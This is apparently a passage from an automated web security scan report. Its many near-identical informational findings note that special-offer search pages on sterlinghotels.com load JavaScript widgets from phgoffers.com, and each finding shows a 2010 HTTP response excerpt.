<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232100125042500"></script>
...[SNIP]...

5.87. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068013792500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:26:40 GMT
Content-Length: 63433

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068013792500"></script>
...[SNIP]...

5.88. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063420823750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:19:01 GMT
Content-Length: 63368

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063420823750"></script>
...[SNIP]...

5.89. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068947073750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:28:14 GMT
Content-Length: 63396

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068947073750"></script>
...[SNIP]...

5.90. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113589886250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:42:38 GMT
Content-Length: 151008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113589886250" type="text/javascript"></script>
...[SNIP]...

5.91. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107972386250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:33:16 GMT
Content-Length: 151023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107972386250" type="text/javascript"></script>
...[SNIP]...

5.92. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105345511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:28:54 GMT
Content-Length: 151087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105345511250" type="text/javascript"></script>
...[SNIP]...

5.93. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232815474886250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 22:12:26 GMT
Content-Length: 150931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232815474886250" type="text/javascript"></script>
...[SNIP]...

5.94. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113531136250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:42:32 GMT
Content-Length: 151023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113531136250" type="text/javascript"></script>
...[SNIP]...

5.95. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115401448750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:45:39 GMT
Content-Length: 151123

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115401448750" type="text/javascript"></script>
...[SNIP]...

5.96. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106241761250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:30:23 GMT
Content-Length: 151057

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106241761250" type="text/javascript"></script>
...[SNIP]...

5.97. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112745511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:41:14 GMT
Content-Length: 151098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112745511250" type="text/javascript"></script>
...[SNIP]...

5.98. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112573323750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:40:56 GMT
Content-Length: 151056

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112573323750" type="text/javascript"></script>
...[SNIP]...

5.99. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106760511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:31:16 GMT
Content-Length: 151046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106760511250" type="text/javascript"></script>
...[SNIP]...

5.100. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104772542500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:27:56 GMT
Content-Length: 150974

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104772542500" type="text/javascript"></script>
...[SNIP]...

5.101. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109745980000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:36:13 GMT
Content-Length: 151275

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109745980000" type="text/javascript"></script>
...[SNIP]...

5.102. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115754105000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:46:14 GMT
Content-Length: 150980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115754105000" type="text/javascript"></script>
...[SNIP]...

5.103. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110216605000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:37:01 GMT
Content-Length: 151009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110216605000" type="text/javascript"></script>
...[SNIP]...

5.104. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112689417500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:41:08 GMT
Content-Length: 151098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112689417500" type="text/javascript"></script>
...[SNIP]...

5.105. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109059573750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:35:05 GMT
Content-Length: 151098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109059573750" type="text/javascript"></script>
...[SNIP]...

5.106. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112879105000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:41:27 GMT
Content-Length: 151009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112879105000" type="text/javascript"></script>
...[SNIP]...

5.107. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110734730000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:37:53 GMT
Content-Length: 150974

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110734730000" type="text/javascript"></script>
...[SNIP]...

5.108. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105428792500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:29:02 GMT
Content-Length: 151008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105428792500" type="text/javascript"></script>
...[SNIP]...

5.109. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107183948750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:31:58 GMT
Content-Length: 151098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107183948750" type="text/javascript"></script>
...[SNIP]...
